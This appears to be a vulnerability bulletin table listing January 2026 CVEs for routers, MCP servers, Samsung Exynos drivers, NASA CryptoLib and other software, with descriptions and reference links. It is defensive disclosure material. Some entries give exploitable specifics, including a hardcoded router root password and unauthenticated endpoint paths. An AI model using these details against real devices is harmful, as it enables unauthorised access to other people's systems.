| n/a--fast-filesystem-mcp version 3.4.0 | fast-filesystem-mcp version 3.4.0 contains a critical path traversal vulnerability in its file operation tools including fast_read_file. This vulnerability arises from improper path validation that fails to resolve symbolic links to their actual physical paths. The safePath and isPathAllowed functions use path.resolve() which does not handle symlinks, allowing attackers to bypass directory access restrictions by creating symlinks within allowed directories that point to restricted system paths. When these symlinks are accessed through valid path references, the validation checks are circumvented, enabling access to unauthorized files. | 2026-01-07 | not yet calculated | CVE-2025-67364 | https://github.com/efforthye/fast-filesystem-mcp/issues/10 https://github.com/efforthye/fast-filesystem-mcp |
| n/a--fluidsynth-2.4.6 and earlier versions | fluidsynth 2.4.6 and earlier versions are vulnerable to a NULL pointer dereference in fluid_synth_monopoly.c that can be triggered when loading an invalid MIDI file. | 2026-01-09 | not yet calculated | CVE-2025-56225 | https://github.com/FluidSynth/fluidsynth/issues/1602 https://github.com/FluidSynth/fluidsynth/pull/1607 |
| n/a--Gl Inet GL.Inet AX1800 Version 4.6.4 & 4.6.8 | The LuCI web interface on Gl Inet GL.Inet AX1800 Version 4.6.4 & 4.6.8 lacks rate limiting or account lockout mechanisms on the authentication endpoint (`/cgi-bin/luci`). An unauthenticated attacker on the local network can perform unlimited password attempts against the admin interface. A fix is available in version 4.8.2. | 2026-01-08 | not yet calculated | CVE-2025-67090 | https://www.gl-inet.com/security/ https://aleksazatezalo.medium.com/critical-command-injection-vulnerability-in-gl-inet-gl-axt1800-router-firmware-e6d67d81ee51?postPublishedType=repub https://aleksazatezalo.medium.com/critical-command-injection-vulnerability-in-gl-inet-gl-axt1800-router-firmware-e6d67d81ee51 |
| n/a--GL-iNet GL-AXT1800 router firmware v4.6.8 | A command injection vulnerability exists in the GL-iNet GL-AXT1800 router firmware v4.6.8. The vulnerability is present in the `plugins.install_package` RPC method, which fails to properly sanitize user input in package names. Authenticated attackers can exploit this to execute arbitrary commands with root privileges. | 2026-01-08 | not yet calculated | CVE-2025-67089 | https://www.gl-inet.com/security-updates/ https://aleksazatezalo.medium.com/critical-command-injection-vulnerability-in-gl-inet-gl-axt1800-router-firmware-e6d67d81ee51?postPublishedType=repub |
| n/a--H3C M102G HM1A0V200R010 wireless controller and BA1500L SWBA1A0V100R006 wireless access point | The H3C M102G HM1A0V200R010 wireless controller and BA1500L SWBA1A0V100R006 wireless access point contain a vsftpd misconfiguration vulnerability. Because of this misconfiguration, all files uploaded anonymously via FTP are automatically owned by the root user, and remote attackers could gain root-level control over the devices. | 2026-01-06 | not yet calculated | CVE-2025-60262 | https://www.notion.so/23e54a1113e780d686fbe1624ee0465d https://www.notion.so/Misconfiguration-in-H3C-23e54a1113e780d686fbe1624ee0465d |
| n/a--Hero Motocorp Vida V1 Pro 2.0.7 | An issue in Hero Motocorp Vida V1 Pro 2.0.7 allows a local attacker to cause a denial of service via the BLE component. | 2026-01-09 | not yet calculated | CVE-2025-67133 | http://hero.com http://vida.com https://threadpoolx.gitbook.io/docs/cve/cve-2025-67133-denial-of-service-via-unauthenticated-ble-connection |
| n/a--indieka900 online-shopping-system-php 1.0 | indieka900 online-shopping-system-php 1.0 is vulnerable to SQL Injection in master/review_action.php via the proId parameter. | 2026-01-08 | not yet calculated | CVE-2025-61246 | https://github.com/hackergovind/CVE-2025-61246 |
| n/a--Insiders Technologies GmbH e-invoice pro before release 1 | An issue in Insiders Technologies GmbH e-invoice pro before release 1 Service Pack 2 allows a remote attacker to cause a denial of service via a crafted script. | 2026-01-08 | not yet calculated | CVE-2025-56424 | https://insiders-technologies.com/en/e-invoice/ https://mind-bytes.de/xml-external-entity-xxe-injection-in-e-invoice-pro-cve-2025-56424/ |
| n/a--Intelbras CFTV IP NVD 9032 R Ftd V2.800.00IB00C.0.T | A vulnerability exists in Intelbras CFTV IP NVD 9032 R Ftd V2.800.00IB00C.0.T, which allows an unauthenticated attacker to bypass the multi-factor authentication (MFA) mechanism during the password recovery process. This results in the ability to change the admin password and gain full access to the administrative panel. | 2026-01-09 | not yet calculated | CVE-2025-67070 | https://github.com/teteco/intelbras-cftv-admin-bypass |
| n/a--JimuReport thru version 2.1.3 | JimuReport thru version 2.1.3 is vulnerable to remote code execution when processing user-controlled H2 JDBC URLs. The application passes the attacker-supplied JDBC URL directly to the H2 driver, allowing the use of certain directives to execute arbitrary Java code. A different vulnerability than CVE-2025-10770. | 2026-01-08 | not yet calculated | CVE-2025-66913 | https://github.com/jeecgboot/jimureport/issues/4306 https://gist.github.com/Catherines77/f15d53e9705b24cf018e5bffed3e8234 |
| n/a--KAYSUS KS-WR1200 routers with firmware 107 | KAYSUS KS-WR1200 routers with firmware 107 expose SSH and TELNET services on the LAN interface with hardcoded root credentials (root:12345678). The administrator cannot disable these services or change the hardcoded password. (Changing the management GUI password does not affect SSH/TELNET authentication.) Any LAN-adjacent attacker can trivially log in with root privileges. | 2026-01-08 | not yet calculated | CVE-2025-68718 | https://www.kaysus.com/ks_wr3600__wifi_7_be3600_wireless_router.html https://github.com/actuator/cve/tree/main/KAYSUS https://github.com/actuator/cve/blob/main/KAYSUS/CVE-2025-68718.txt |
| n/a--KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 | KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 have the SSH service enabled by default on the LAN interface. The root account is configured with no password, and administrators cannot disable SSH or enforce authentication via the CLI or web GUI. This allows any LAN-adjacent attacker to trivially gain root shell access and execute arbitrary commands with full privileges. | 2026-01-08 | not yet calculated | CVE-2025-68716 | https://www.kaysus.com/ks_wr3600__wifi_7_be3600_wireless_router.html https://github.com/actuator/cve/tree/main/KAYSUS https://github.com/actuator/cve/blob/main/KAYSUS/CVE-2025-68716.txt |
| n/a--KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 | KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 allow authentication bypass during session validation. If any user is logged in, endpoints such as /cgi-bin/system-tool accept unauthenticated requests with empty or invalid session values. This design flaw lets attackers piggyback on another user's active session to retrieve sensitive configuration data or execute privileged actions without authentication. | 2026-01-08 | not yet calculated | CVE-2025-68717 | https://www.kaysus.com/ks_wr3600__wifi_7_be3600_wireless_router.html https://github.com/actuator/cve/tree/main/KAYSUS https://github.com/actuator/cve/blob/main/KAYSUS/CVE-2025-68717.txt |
| n/a--KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 | KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 mishandle configuration management. Once any user is logged in and maintains an active session, an attacker can directly query the backup endpoint and download a full configuration archive. This archive contains sensitive files such as /etc/shadow, enabling credential recovery and potential full compromise of the device. | 2026-01-08 | not yet calculated | CVE-2025-68719 | https://www.kaysus.com/ks_wr3600__wifi_7_be3600_wireless_router.html https://github.com/actuator/cve/tree/main/KAYSUS https://github.com/actuator/cve/blob/main/KAYSUS/CVE-2025-68719.txt |
| n/a--Mega-Fence (webgate-lib.*) 25.1.914 and prior | Mega-Fence (webgate-lib.*) 25.1.914 and prior trusts the first value of the X-Forwarded-For (XFF) header as the client IP without validating a trusted proxy chain. An attacker can supply an arbitrary XFF value in a remote request to spoof the client IP, which is then propagated to security-relevant state (e.g., WG_CLIENT_IP cookie). Deployments that rely on this value for IP allowlists may be bypassed. | 2026-01-05 | not yet calculated | CVE-2025-65328 | https://drive.proton.me/urls/MY05PVBFXG#xDd2Xqy98WM9 https://raw.githubusercontent.com/p1aintext/CVE/main/CVE-2025-65328.md |
| n/a--Nitro PDF Pro for Windows before 14.42.0.34. | An issue was discovered in Nitro PDF Pro for Windows before 14.42.0.34. In certain cases, it displays signer information from a non-verified PDF field rather than from the verified certificate subject. This could allow a document to present inconsistent signer details. The display logic was updated to ensure signer information consistently reflects the verified certificate identity. | 2026-01-08 | not yet calculated | CVE-2025-67825 | https://gonitro.com https://www.gonitro.com/documentation/release-notes |
| n/a--NJHYST HY511 POE core before 2.1 and plugins before 0.1. | An issue was discovered in NJHYST HY511 POE core before 2.1 and plugins before 0.1. The vulnerability stems from the device's insufficient cookie verification, allowing an attacker to directly request the configuration file address and download the core configuration file without logging into the device management backend. By reading the corresponding username and self-decrypted MD5 password in the core configuration file, the attacker can directly log in to the backend, thereby bypassing the front-end backend login page. | 2026-01-06 | not yet calculated | CVE-2025-65212 | https://github.com/a2148001284/test1/blob/main/%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E5%90%8E%E5%8F%B0%E6%BC%8F%E6%B4%9EEN.md https://gist.github.com/a2148001284/bcdda75fc8718454f16a7b9259463719 |
| n/a--OpenAirInterface CN5G AMF<=v2.0.1 | OpenAirInterface CN5G AMF <= v2.0.1 contains a logic error when processing JSON-format requests. Unauthorized remote attackers can send malicious JSON data to the AMF's SBI interface to launch a denial-of-service attack. | 2026-01-07 | not yet calculated | CVE-2025-66786 | https://github.com/swallele/Vulnerability/blob/main/Openairinterface/Dos/Json_Dos.md |
| n/a--OpenAirInterface CN5G AMF<=v2.1.9 | OpenAirInterface CN5G AMF<=v2.1.9 has a buffer overflow vulnerability in processing NAS messages. Unauthorized remote attackers can launch a denial-of-service attack and potentially execute malicious code by accessing port N1 and sending an imsi string longer than 1000 to AMF. | 2026-01-07 | not yet calculated | CVE-2025-65805 | https://github.com/swallele/Vulnerability/blob/main/Openairinterface/Buffer_Overflow/Vulnerability_Report.md |
| n/a--Panda Wireless PWRU0 devices with firmware 2.2.9 | An issue was discovered in Panda Wireless PWRU0 devices with firmware 2.2.9 that exposes multiple HTTP endpoints (/goform/setWan, /goform/setLan, /goform/wirelessBasic) that do not enforce authentication. A remote unauthenticated attacker can modify WAN, LAN, and wireless settings directly, leading to privilege escalation and denial of service. | 2026-01-08 | not yet calculated | CVE-2025-68715 | https://github.com/actuator/cve/tree/main/PandaWireless https://github.com/actuator/cve/blob/main/PandaWireless/CVE-2025-68715.txt |
| n/a--Passy v.1.6.3 | An issue in Passy v.1.6.3 allows a remote authenticated attacker to execute arbitrary commands via a crafted HTTP request using a specific payload injection. | 2026-01-05 | not yet calculated | CVE-2025-67397 | https://www.passy.it/ https://github.com/giulioschiavone/Vulnerability-Research/tree/main/CVE-2025-67397 |
| n/a--Perch CMS version 3.2 | A stored Cross-Site Scripting (XSS) vulnerability exists in Perch CMS version 3.2. An authenticated attacker with administrative privileges can inject malicious JavaScript code into the "Help button url" setting within the admin panel. The injected payload is stored and executed when any authenticated user clicks the Help button, potentially leading to session hijacking, information disclosure, privilege escalation, and unauthorized administrative actions. | 2026-01-07 | not yet calculated | CVE-2025-66686 | https://github.com/mertdurum06/Perch-v3.2 https://github.com/mertdurum06/Perch-v3.2/blob/main/Perch%20v3.2_Poc.txt |
| n/a--phpgurukul Hostel Management System v2.1 | Stored Cross-Site Scripting exists in phpgurukul Hostel Management System v2.1: user-provided complaint fields (Explain the Complaint) submitted via /register-complaint.php are stored and rendered unescaped in the admin viewer (/admin/complaint-details.php?cid=<id>). When an administrator opens the complaint, injected HTML/JavaScript executes in the admin's browser. | 2026-01-08 | not yet calculated | CVE-2025-63611 | https://phpgurukul.com/hostel-management-system/ https://medium.com/@tanushkushtk01/cve-2025-63611-stored-cross-site-scripting-xss-in-hostel-management-system-v2-1-a23c2efc86ea |
| n/a--Plesk Obsidian versions 8.0.1 through 18.0.73 | Plesk Obsidian versions 8.0.1 through 18.0.73 are vulnerable to a Denial of Service (DoS) condition. The vulnerability exists in the get_password.php endpoint, where a crafted request containing a malicious payload can cause the affected web interface to continuously reload, rendering the service unavailable to legitimate users. An attacker can exploit this issue remotely without authentication, resulting in a persistent availability impact on the affected Plesk Obsidian instance. | 2026-01-08 | not yet calculated | CVE-2025-65518 | http://plesk.com https://github.com/Jainil-89/CVE-2025-65518/blob/main/cve.md https://docs.plesk.com/release-notes/obsidian/change-log/ |
| n/a--pss.sale.com 1.0 | SQL injection vulnerability in pss.sale.com 1.0 via the id parameter to the userfiles/php/cancel_order.php endpoint. | 2026-01-09 | not yet calculated | CVE-2025-51626 | https://gitee.com/XiaoLiuChu/pss.sale.com/tree/master https://gist.github.com/hnking-star/17d4c9c990c2324ef109fecb4fc4630c |
| n/a--QloApps versions 1.7.0 and earlier | Unrestricted file upload in the hotel review feature in QloApps versions 1.7.0 and earlier allows remote unauthenticated attackers to achieve remote code execution. | 2026-01-08 | not yet calculated | CVE-2025-67325 | https://github.com/Qloapps/QloApps https://github.com/mr7s3d0/CVE-2025-67325 |
| n/a--RuoYi-Vue-Plus versions 5.5.1 and earlier | In the snailjob component of RuoYi-Vue-Plus versions 5.5.1 and earlier, the /snail-job/workflow/check-node-expression interface can execute QLExpress expressions but does not filter user input, allowing attackers to use the File class to perform arbitrary file reading and writing. | 2026-01-08 | not yet calculated | CVE-2025-66916 | https://gitee.com/dromara/RuoYi-Vue-Plus https://github.com/Catherines77/code-au/blob/main/ruoyi-vue-plus/QLExpress.md https://gist.github.com/Catherines77/e3f06b9c4cc6298579e858088a243c3d |
| n/a--Samsung Magician 6.3.0 through 8.3.2 on Windows | An issue was discovered in Samsung Magician 6.3.0 through 8.3.2 on Windows. The installer creates a temporary folder with weak permissions during installation, allowing a non-admin user to perform DLL hijacking and escalate privileges. | 2026-01-05 | not yet calculated | CVE-2025-57836 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-57836/ |
| n/a--Samsung Mobile Processor and Wearable Processor Exynos 1330, 1380, 1480, 2400, 1580, 2500 | An issue was discovered in the Camera in Samsung Mobile Processor and Wearable Processor Exynos 1330, 1380, 1480, 2400, 1580, 2500. A race condition in the issimian device driver results in an out-of-bounds access, leading to a denial of service. | 2026-01-05 | not yet calculated | CVE-2025-52515 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-52515/ |
| n/a--Samsung Mobile Processor and Wearable Processor Exynos 1330, 1380, 1480, 2400, 1580, 2500 | An issue was discovered in the Camera in Samsung Mobile Processor and Wearable Processor Exynos 1330, 1380, 1480, 2400, 1580, 2500. An invalid kernel address dereference in the issimian device driver leads to a denial of service. | 2026-01-05 | not yet calculated | CVE-2025-52516 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-52516/ |
| n/a--Samsung Mobile Processor and Wearable Processor Exynos 1330, 1380, 1480, 2400, 1580, 2500 | An issue was discovered in the Camera in Samsung Mobile Processor and Wearable Processor Exynos 1330, 1380, 1480, 2400, 1580, 2500. A race condition in the issimian device driver results in a double free, leading to a denial of service. | 2026-01-05 | not yet calculated | CVE-2025-52517 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-52517/ |
| n/a--Samsung Mobile Processor and Wearable Processor Exynos 1330, 1380, 1480, 2400, 1580, 2500 | An issue was discovered in the Camera in Samsung Mobile Processor and Wearable Processor Exynos 1330, 1380, 1480, 2400, 1580, and 2500. Improper validation of user-space input in the issimian device driver leads to information disclosure and a denial of service. | 2026-01-05 | not yet calculated | CVE-2025-52519 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-52519/ |
| n/a--Samsung Mobile Processor Exynos 1380, 1480, 2400, 1580 | An issue was discovered in the WiFi driver in Samsung Mobile Processor Exynos 1380, 1480, 2400, 1580. Mishandling of an NL80211 vendor command leads to a buffer overflow. | 2026-01-05 | not yet calculated | CVE-2025-49495 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-49495/ |
| n/a--Samsung Mobile Processor Exynos 1380, 1480, 2400, and 1580 | An issue was discovered in Samsung Mobile Processor Exynos 1380, 1480, 2400, and 1580. Incorrect Handling of the NL80211 vendor command leads to a buffer overflow during handling of an IOCTL message. | 2026-01-05 | not yet calculated | CVE-2025-53966 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-53966/ |
| n/a--Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 9110, W920, W930, W1000, Modem 5123, Modem 5300, Modem 5400 | An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 9110, W920, W930, W1000, Modem 5123, Modem 5300, Modem 5400. The lack of a length check leads to out-of-bounds writes via malformed NAS packets. | 2026-01-05 | not yet calculated | CVE-2025-27807 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-27807/ |
| n/a--Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 9110, W920, W930, W1000, Modem 5123, Modem 5300, Modem 5400 | An issue was discovered in L2 in c. Incorrect handling of RRC packets leads to a Denial of Service. | 2026-01-05 | not yet calculated | CVE-2025-43706 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-43706/ |
| n/a--shiori v1.7.4 | A lack of rate limiting in the login page of shiori v1.7.4 and below allows attackers to bypass authentication via a brute force attack. | 2026-01-09 | not yet calculated | CVE-2025-60538 | https://github.com/go-shiori/shiori https://github.com/go-shiori/shiori/issues/1138 |
| n/a--sonirico mcp-shell v0.3.1 | A command injection vulnerability in the shell_exec function of sonirico mcp-shell v0.3.1 allows attackers to execute arbitrary commands via supplying a crafted command string. | 2026-01-07 | not yet calculated | CVE-2025-61489 | https://github.com/sonirico/mcp-shell https://github.com/sonirico/mcp-shell/issues/4 |
| n/a--Technitium DNS Server v.13.5 | An issue in Technitium DNS Server v.13.5 allows a remote attacker to cause a denial of service via the rate-limiting component. | 2026-01-08 | not yet calculated | CVE-2025-50334 | https://github.com/TechnitiumSoftware/DnsServer/blob/master/CHANGELOG.md http://technitium.com https://github.com/TechnitiumSoftware/DnsServer/blob/v13.3/DnsServerCore/Dns/DnsServer.cs https://github.com/FPokerFace/Security-Advisory/tree/main/CVE-2025-50334 https://github.com/TechnitiumSoftware/DnsServer/commit/7229b217238213cc6275eea68a7e17d73df1603e |
| n/a--terminal-controller-mcp 0.1.7 | A command injection vulnerability in the execute_command function of terminal-controller-mcp 0.1.7 allows attackers to execute arbitrary commands via a crafted input. | 2026-01-07 | not yet calculated | CVE-2025-61492 | https://github.com/cfdude/super-shell-mcp/issues/19 https://github.com/GongRzhe/terminal-controller-mcp https://github.com/GongRzhe/terminal-controller-mcp/issues/7 |
| n/a--TIM BPM Suite/ TIM FLOW through 9.1.2 | In TIM BPM Suite/ TIM FLOW through 9.1.2, multiple Authorization Bypass vulnerabilities exist which allow a low-privileged user to download password hashes of other users, access work items of other users, modify restricted content in workflows, modify the application's logo, and manipulate the profiles of other users. | 2026-01-09 | not yet calculated | CVE-2025-67282 | https://tim-doc.atlassian.net/wiki/spaces/eng/pages/230981636/Release+Notes https://www.y-security.de/news-en/tim-bpm-suite-tim-flow-multiple-vulnerabilities/ |
| n/a--TIM Solution GmbH TIM BPM Suite & TIM FLOW before v.9.1.2 | An issue in TIM Solution GmbH TIM BPM Suite & TIM FLOW before v.9.1.2 allows a remote attacker to escalate privileges via a crafted HTTP request. | 2026-01-09 | not yet calculated | CVE-2025-67278 | https://tim-doc.atlassian.net/wiki/spaces/eng/pages/230981636/Release+Notes https://www.y-security.de/news-en/tim-bpm-suite-tim-flow-multiple-vulnerabilities/ |
| n/a--TIM Solution GmbH TIM BPM Suite & TIM FLOW before v.9.1.2 | An issue in TIM Solution GmbH TIM BPM Suite & TIM FLOW before v.9.1.2 allows a remote attacker to escalate privileges because the application stores password hashes in MD5 format. | 2026-01-09 | not yet calculated | CVE-2025-67279 | https://tim-doc.atlassian.net/wiki/spaces/eng/pages/230981636/Release+Notes https://www.y-security.de/news-en/tim-bpm-suite-tim-flow-multiple-vulnerabilities/ |
| n/a--TIM Solution GmbH TIM BPM Suite & TIM FLOW before v.9.1.2 | In TIM BPM Suite/ TIM FLOW through 9.1.2 multiple Hibernate Query Language injection vulnerabilities exist which allow a low privileged user to extract passwords of other users and access sensitive data of another user. | 2026-01-09 | not yet calculated | CVE-2025-67280 | https://tim-doc.atlassian.net/wiki/spaces/eng/pages/230981636/Release+Notes https://www.y-security.de/news-en/tim-bpm-suite-tim-flow-multiple-vulnerabilities/ |
| n/a--TIM Solution GmbH TIM BPM Suite & TIM FLOW before v.9.1.2 | In TIM BPM Suite/ TIM FLOW through 9.1.2, multiple SQL injection vulnerabilities exist which allow low-privileged and administrative users to access the database and its content. | 2026-01-09 | not yet calculated | CVE-2025-67281 | https://tim-doc.atlassian.net/wiki/spaces/eng/pages/230981636/Release+Notes https://www.y-security.de/news-en/tim-bpm-suite-tim-flow-multiple-vulnerabilities/ |
| n/a--Yonyou YonBIP v3 and before | In Yonyou YonBIP v3 and before, the LoginWithV8 interface in the series data application service system is vulnerable to path traversal, allowing unauthorized access to sensitive information within the system. | 2026-01-09 | not yet calculated | CVE-2025-66744 | https://github.com/iSee857/YonYouBip-path-travel |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, an out-of-bounds heap read vulnerability in cryptography_encrypt() occurs when parsing JSON metadata from KMC server responses. The flawed strtok iteration pattern uses ptr + strlen(ptr) + 1 which reads one byte past allocated buffer boundaries when processing short or malformed metadata strings. This issue has been patched in version 1.4.3. | 2026-01-10 | not yet calculated | CVE-2026-21900 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-4g6v-36fv-qcvw https://github.com/nasa/CryptoLib/commit/2372efd3da1ccb226b4297222e25f41ecc84821d https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, there is an out-of-bounds heap read vulnerability in cryptography_aead_encrypt(). This issue has been patched in version 1.4.3. | 2026-01-10 | not yet calculated | CVE-2026-22023 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-8w3h-q8jm-3chq https://github.com/nasa/CryptoLib/commit/2372efd3da1ccb226b4297222e25f41ecc84821d https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, the cryptography_encrypt() function allocates multiple buffers for HTTP requests and JSON parsing that are never freed on any code path. Each call leaks approximately 400 bytes of memory. Sustained traffic can gradually exhaust available memory. This issue has been patched in version 1.4.3. | 2026-01-10 | not yet calculated | CVE-2026-22024 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-r3wg-g8xv-gxvf https://github.com/nasa/CryptoLib/commit/2372efd3da1ccb226b4297222e25f41ecc84821d https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, when the KMC server returns a non-200 HTTP status code, cryptography_encrypt() and cryptography_decrypt() return immediately without freeing previously allocated buffers. Each failed request leaks approximately 467 bytes. Repeated failures (from a malicious server or network issues) can gradually exhaust memory. This issue has been patched in version 1.4.3. | 2026-01-10 | not yet calculated | CVE-2026-22025 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-h74x-vwwr-mm5g https://github.com/nasa/CryptoLib/commit/2372efd3da1ccb226b4297222e25f41ecc84821d https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, the libcurl write_callback function in the KMC crypto service client allows unbounded memory growth by reallocating response buffers without any size limit or overflow check. A malicious KMC server can return arbitrarily large HTTP responses, forcing the client to allocate excessive memory until the process is terminated by the OS. This issue has been patched in version 1.4.3. | 2026-01-10 | not yet calculated | CVE-2026-22026 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-w9cm-q69w-34x7 https://github.com/nasa/CryptoLib/commit/2372efd3da1ccb226b4297222e25f41ecc84821d https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, the convert_hexstring_to_byte_array() function in the MariaDB SA interface writes decoded bytes into a caller-provided buffer without any capacity check. When importing SA fields from the database (e.g., IV, ARSN, ABM), a malformed or oversized hex string in the database can overflow the destination buffer, corrupting adjacent heap memory. This issue has been patched in version 1.4.3. | 2026-01-10 | not yet calculated | CVE-2026-22027 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-3m35-m689-h29x https://github.com/nasa/CryptoLib/commit/2372efd3da1ccb226b4297222e25f41ecc84821d https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| Nokia--SR Linux | Nokia SR Linux is vulnerable to an authentication vulnerability allowing unauthorized access to the JSON-RPC service. When exploited, an invalid validation allows JSON RPC access without providing valid authentication credentials. | 2026-01-07 | not yet calculated | CVE-2025-0980 | Nokia Product Security Advisory |
| Noor Alam--Easy Media Download | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Noor Alam Easy Media Download easy-media-download allows Reflection Injection. This issue affects Easy Media Download: from n/a through <= 1.1.11. | 2026-01-08 | not yet calculated | CVE-2025-69169 | https://vdp.patchstack.com/database/Wordpress/Plugin/easy-media-download/vulnerability/wordpress-easy-media-download-plugin-1-1-11-css-injection-vulnerability?_s_id=cve |
| Open Microscopy Environment--Bio-Formats | Bio-Formats versions up to and including 8.3.0 contain an XML External Entity (XXE) vulnerability in the Leica Microsystems metadata parsing component (e.g., XLEF). The parser uses an insecurely configured DocumentBuilderFactory when processing Leica XML-based metadata files, allowing external entity expansion and external DTD loading. A crafted metadata file can trigger outbound network requests (SSRF), access local system resources where readable, or cause a denial of service during XML parsing. | 2026-01-07 | not yet calculated | CVE-2026-22186 | https://seclists.org/fulldisclosure/2026/Jan/6 https://docs.openmicroscopy.org/bio-formats/ https://www.vulncheck.com/advisories/bio-formats-xxe-in-leica-xlef-metadata-parser |
| Open Microscopy Environment--Bio-Formats | Bio-Formats versions up to and including 8.3.0 perform unsafe Java deserialization of attacker-controlled memoization cache files (.bfmemo) during image processing. The loci.formats.Memoizer class automatically loads and deserializes memo files associated with images without validation, integrity checks, or trust enforcement. An attacker who can supply a crafted .bfmemo file alongside an image can trigger deserialization of untrusted data, which may result in denial of service, logic manipulation, or potentially remote code execution in environments where suitable gadget chains are present on the classpath. | 2026-01-07 | not yet calculated | CVE-2026-22187 | https://seclists.org/fulldisclosure/2026/Jan/7 https://docs.openmicroscopy.org/bio-formats/ https://www.vulncheck.com/advisories/bio-formats-memoizer-unsafe-deserialization-via-bfmemo-cache-files |
| open-metadata--OpenMetadata | OpenMetadata is a unified metadata platform. Versions prior to 1.11.4 are vulnerable to remote code execution via Server-Side Template Injection (SSTI) in FreeMarker email templates. An attacker must have administrative privileges to exploit the vulnerability. Version 1.11.4 contains a patch. | 2026-01-08 | not yet calculated | CVE-2026-22244 | https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-5f29-2333-h9c7 https://github.com/open-metadata/OpenMetadata/commit/bffe7c45807763f9b682021d4211c478d2a08bb3 |
| OpenFlagr--Flagr | OpenFlagr versions prior to and including 1.1.18 contain an authentication bypass vulnerability in the HTTP middleware. Due to improper handling of path normalization in the whitelist logic, crafted requests can bypass authentication and access protected API endpoints without valid credentials. Unauthorized access may allow modification of feature flags and export of sensitive data. | 2026-01-07 | not yet calculated | CVE-2026-0650 | https://github.com/openflagr/flagr/releases/tag/1.1.19 https://dreyand.rs/code%20review/golang/2026/01/03/0day-speedrun-openflagr-less-1118-authentication-bypass https://www.vulncheck.com/advisories/openflagr-authentication-bypass-via-prefix-whitelist-path-normalization |
| OpenLDAP Foundation--OpenLDAP | OpenLDAP Lightning Memory-Mapped Database (LMDB) versions up to and including 0.9.14, prior to commit 8e1fda8, contain a heap buffer underflow in the readline() function of mdb_load. When processing malformed input containing an embedded NUL byte, an unsigned offset calculation can underflow and cause an out-of-bounds read of one byte before the allocated heap buffer. This can cause mdb_load to crash, leading to a limited denial-of-service condition. | 2026-01-07 | not yet calculated | CVE-2026-22185 | https://seclists.org/fulldisclosure/2026/Jan/5 https://seclists.org/fulldisclosure/2026/Jan/8 https://www.openldap.org/ https://www.vulncheck.com/advisories/openldap-lmdb-mdb-load-heap-buffer-underflow-in-readline https://bugs.openldap.org/show_bug.cgi?id=10421 |
| opf--openproject | OpenProject is an open-source, web-based project management software. In OpenProject version 16.6.1 and below, a registered administrator can execute arbitrary commands by configuring the sendmail binary path and sending a test email. This issue has been patched in version 16.6.2. | 2026-01-10 | not yet calculated | CVE-2026-22601 | https://github.com/opf/openproject/security/advisories/GHSA-9vrv-7h26-c7jc https://github.com/opf/openproject/releases/tag/v16.6.2 |
